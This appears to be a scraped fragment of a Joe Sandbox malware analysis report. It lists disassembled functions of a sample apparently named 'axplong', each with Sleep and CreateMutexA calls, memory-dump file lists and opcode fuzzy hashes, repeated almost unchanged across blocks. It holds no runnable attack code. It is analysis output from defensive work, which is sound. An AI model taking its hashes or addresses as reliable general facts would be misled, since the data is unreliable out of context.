Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00000064), ref: 0063A893
CreateMutexA.KERNELBASE(00000000,00000000,00693224), ref: 0063A8B1

Strings

$2i, xrefs: 0063A8A0

Memory Dump Source

Source File: 00000008.00000002.269513200124.0000000000631000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00630000, based on PE: true

Associated: 00000008.00000002.269513145984.0000000000630000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.269513200124.0000000000692000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.269513595211.0000000000699000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.269513671262.000000000069B000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.269513735245.00000000006A7000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.269514347418.0000000000802000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.269514432008.0000000000804000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.269514525267.0000000000813000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.269514525267.0000000000820000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.269514641821.0000000000825000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.269514706618.0000000000827000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.269514770260.0000000000828000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.269514839514.0000000000829000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.269514897278.000000000083B000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.269514960709.000000000083D000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.269515042278.000000000084D000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.269515083501.000000000084E000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.269515158068.000000000084F000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.269515238124.0000000000850000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.269515314679.0000000000858000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.269515373024.0000000000864000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.269515466707.0000000000876000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.269515658724.0000000000878000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.269515743080.0000000000879000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.269515811594.0000000000880000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.269515885959.000000000088D000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.269515932789.0000000000891000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.269515977351.000000000089A000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.269516054500.000000000089B000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.269516158855.000000000089C000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.269516236487.000000000089F000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.269516307869.00000000008A7000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.269516368569.00000000008A8000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.269516444467.00000000008A9000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.269516506383.00000000008AB000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.269516583797.00000000008AC000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.269516777646.00000000008B0000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.269516842756.00000000008B9000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.269516927084.00000000008BC000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.269517008618.00000000008CA000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.269517071900.00000000008CC000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.269517161904.00000000008D5000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.269517231932.00000000008D9000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.269517231932.00000000008F6000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.269517486846.0000000000923000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.269517551937.0000000000924000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.269517740481.000000000092C000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.269517802876.000000000092E000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.269518016637.000000000093B000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.269518066594.000000000093C000.00000080.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_630000_axplong.jbxd

Yara matches

Similarity

API ID: CreateMutexSleep
String ID: $2i
API String ID: 1464230837-421247651
Opcode ID: 2cd9b5e0ba339a645f8c7d0d5bbab3c566c53520d1c23d32475f4cef54ab4839
Instruction ID: 01e8b5ab11cdbc9360508eed5b8fdef973dda395cf3bad3451d36652f163c930
Opcode Fuzzy Hash: 2cd9b5e0ba339a645f8c7d0d5bbab3c566c53520d1c23d32475f4cef54ab4839
Instruction Fuzzy Hash: AD315731B001048BEF0CDBA8DC8876DB773AF86314F20861CE0509B7E5C77589819796

Function 0063A0DE Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 135
sleepsynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00000064), ref: 0063A893
CreateMutexA.KERNELBASE(00000000,00000000,00693224), ref: 0063A8B1

Strings

$2i, xrefs: 0063A8A0

Memory Dump Source

Source File: 00000008.00000002.269513200124.0000000000631000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00630000, based on PE: true

Associated: 00000008.00000002.269513145984.0000000000630000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.269513200124.0000000000692000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.269513595211.0000000000699000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.269513671262.000000000069B000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.269513735245.00000000006A7000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.269514347418.0000000000802000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.269514432008.0000000000804000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.269514525267.0000000000813000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.269514525267.0000000000820000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.269514641821.0000000000825000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.269514706618.0000000000827000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.269514770260.0000000000828000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.269514839514.0000000000829000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.269514897278.000000000083B000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.269514960709.000000000083D000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.269515042278.000000000084D000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.269515083501.000000000084E000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.269515158068.000000000084F000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.269515238124.0000000000850000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.269515314679.0000000000858000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.269515373024.0000000000864000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.269515466707.0000000000876000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.269515658724.0000000000878000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.269515743080.0000000000879000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.269515811594.0000000000880000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.269515885959.000000000088D000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.269515932789.0000000000891000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.269515977351.000000000089A000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.269516054500.000000000089B000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.269516158855.000000000089C000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.269516236487.000000000089F000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.269516307869.00000000008A7000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.269516368569.00000000008A8000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.269516444467.00000000008A9000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.269516506383.00000000008AB000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.269516583797.00000000008AC000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.269516777646.00000000008B0000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.269516842756.00000000008B9000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.269516927084.00000000008BC000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.269517008618.00000000008CA000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.269517071900.00000000008CC000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.269517161904.00000000008D5000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.269517231932.00000000008D9000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.269517231932.00000000008F6000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.269517486846.0000000000923000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.269517551937.0000000000924000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.269517740481.000000000092C000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.269517802876.000000000092E000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.269518016637.000000000093B000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.269518066594.000000000093C000.00000080.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_630000_axplong.jbxd

Yara matches

Similarity

API ID: CreateMutexSleep
String ID: $2i
API String ID: 1464230837-421247651
Opcode ID: f3fa0aa40ca0356c91e2496a40b585982cea4f560320109cca7f756cf3aa5209
Instruction ID: 7e126f97b4a96dd5c27cfd161e7c35320e47c3d7b9429443d9f5268600f9af12
Opcode Fuzzy Hash: f3fa0aa40ca0356c91e2496a40b585982cea4f560320109cca7f756cf3aa5209
Instruction Fuzzy Hash: CE311471B10100CBEF1CDBB8DC887ADB763AF86314F204669E050AB7E5D77989819796

Function 0063A348 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 133
sleepsynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00000064), ref: 0063A893
CreateMutexA.KERNELBASE(00000000,00000000,00693224), ref: 0063A8B1

Strings

$2i, xrefs: 0063A8A0

Memory Dump Source

Source File: 00000008.00000002.269513200124.0000000000631000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00630000, based on PE: true

Associated: 00000008.00000002.269513145984.0000000000630000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.269513200124.0000000000692000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.269513595211.0000000000699000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.269513671262.000000000069B000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.269513735245.00000000006A7000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.269514347418.0000000000802000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.269514432008.0000000000804000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.269514525267.0000000000813000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.269514525267.0000000000820000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.269514641821.0000000000825000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.269514706618.0000000000827000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.269514770260.0000000000828000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.269514839514.0000000000829000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.269514897278.000000000083B000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.269514960709.000000000083D000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.269515042278.000000000084D000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.269515083501.000000000084E000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.269515158068.000000000084F000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.269515238124.0000000000850000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.269515314679.0000000000858000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.269515373024.0000000000864000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.269515466707.0000000000876000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.269515658724.0000000000878000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.269515743080.0000000000879000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.269515811594.0000000000880000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.269515885959.000000000088D000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.269515932789.0000000000891000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.269515977351.000000000089A000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.269516054500.000000000089B000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.269516158855.000000000089C000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.269516236487.000000000089F000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.269516307869.00000000008A7000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.269516368569.00000000008A8000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.269516444467.00000000008A9000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.269516506383.00000000008AB000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.269516583797.00000000008AC000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.269516777646.00000000008B0000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.269516842756.00000000008B9000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.269516927084.00000000008BC000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.269517008618.00000000008CA000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.269517071900.00000000008CC000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.269517161904.00000000008D5000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.269517231932.00000000008D9000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.269517231932.00000000008F6000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.269517486846.0000000000923000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.269517551937.0000000000924000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.269517740481.000000000092C000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.269517802876.000000000092E000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.269518016637.000000000093B000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.269518066594.000000000093C000.00000080.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_630000_axplong.jbxd

Yara matches

Similarity

API ID: CreateMutexSleep
String ID: $2i
API String ID: 1464230837-421247651
Opcode ID: 121de9f5a3eb6d79f476d3baa69c6f814856bd8a540e7d78e68d9b603ac20a11
Instruction ID: b580e401cbb4cac5cb5290978145a830dea91d792c134af5ccaffa94310d4a5b
Opcode Fuzzy Hash: 121de9f5a3eb6d79f476d3baa69c6f814856bd8a540e7d78e68d9b603ac20a11
Instruction Fuzzy Hash: DC313771B10100CBFB1C9BB8DC887ADB7A3AF86314F208658E050DB7E5DB7999819792

Function 0063A47D Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 132
sleepsynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00000064), ref: 0063A893
CreateMutexA.KERNELBASE(00000000,00000000,00693224), ref: 0063A8B1

Strings

$2i, xrefs: 0063A8A0

Memory Dump Source

Source File: 00000008.00000002.269513200124.0000000000631000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00630000, based on PE: true

Associated: 00000008.00000002.269513145984.0000000000630000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.269513200124.0000000000692000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.269513595211.0000000000699000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.269513671262.000000000069B000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.269513735245.00000000006A7000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.269514347418.0000000000802000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.269514432008.0000000000804000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.269514525267.0000000000813000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.269514525267.0000000000820000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.269514641821.0000000000825000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.269514706618.0000000000827000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.269514770260.0000000000828000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.269514839514.0000000000829000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.269514897278.000000000083B000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.269514960709.000000000083D000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.269515042278.000000000084D000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.269515083501.000000000084E000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.269515158068.000000000084F000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.269515238124.0000000000850000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.269515314679.0000000000858000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.269515373024.0000000000864000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.269515466707.0000000000876000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.269515658724.0000000000878000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.269515743080.0000000000879000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.269515811594.0000000000880000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.269515885959.000000000088D000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.269515932789.0000000000891000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.269515977351.000000000089A000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.269516054500.000000000089B000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.269516158855.000000000089C000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.269516236487.000000000089F000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.269516307869.00000000008A7000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.269516368569.00000000008A8000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.269516444467.00000000008A9000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.269516506383.00000000008AB000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.269516583797.00000000008AC000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.269516777646.00000000008B0000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.269516842756.00000000008B9000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.269516927084.00000000008BC000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.269517008618.00000000008CA000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.269517071900.00000000008CC000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.269517161904.00000000008D5000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.269517231932.00000000008D9000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.269517231932.00000000008F6000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.269517486846.0000000000923000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.269517551937.0000000000924000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.269517740481.000000000092C000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.269517802876.000000000092E000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.269518016637.000000000093B000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.269518066594.000000000093C000.00000080.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_630000_axplong.jbxd

Yara matches

Similarity

API ID: CreateMutexSleep
String ID: $2i
API String ID: 1464230837-421247651
Opcode ID: 6db99bb820f5d1e282b2533145cbab7a22bbe8eae8ccb3c6ede98a4c4f632233
Instruction ID: 70082a647f8499d41cee82c0eeb2daf81790910cb9ddce115029d9334de7622d
Opcode Fuzzy Hash: 6db99bb820f5d1e282b2533145cbab7a22bbe8eae8ccb3c6ede98a4c4f632233
Instruction Fuzzy Hash: 43314831B001008BEF0CDBBCDD8876DB763AF86314F20465CE0959B7E6D77989819792

Function 0063A5B2 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 131
sleepsynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00000064), ref: 0063A893
CreateMutexA.KERNELBASE(00000000,00000000,00693224), ref: 0063A8B1

Strings

$2i, xrefs: 0063A8A0

Memory Dump Source

Source File: 00000008.00000002.269513200124.0000000000631000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00630000, based on PE: true

Associated: 00000008.00000002.269513145984.0000000000630000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.269513200124.0000000000692000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.269513595211.0000000000699000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.269513671262.000000000069B000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.269513735245.00000000006A7000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.269514347418.0000000000802000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.269514432008.0000000000804000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.269514525267.0000000000813000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.269514525267.0000000000820000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.269514641821.0000000000825000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.269514706618.0000000000827000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.269514770260.0000000000828000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.269514839514.0000000000829000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.269514897278.000000000083B000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.269514960709.000000000083D000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.269515042278.000000000084D000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.269515083501.000000000084E000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.269515158068.000000000084F000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.269515238124.0000000000850000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.269515314679.0000000000858000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.269515373024.0000000000864000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.269515466707.0000000000876000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.269515658724.0000000000878000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.269515743080.0000000000879000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.269515811594.0000000000880000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.269515885959.000000000088D000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.269515932789.0000000000891000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.269515977351.000000000089A000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.269516054500.000000000089B000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.269516158855.000000000089C000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.269516236487.000000000089F000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.269516307869.00000000008A7000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.269516368569.00000000008A8000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.269516444467.00000000008A9000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.269516506383.00000000008AB000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.269516583797.00000000008AC000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.269516777646.00000000008B0000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.269516842756.00000000008B9000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.269516927084.00000000008BC000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.269517008618.00000000008CA000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.269517071900.00000000008CC000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.269517161904.00000000008D5000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.269517231932.00000000008D9000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.269517231932.00000000008F6000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000008.00000002.269517486846.0000000000923000.00000040.00000001.01000000.0000000A.sdmpDownload File
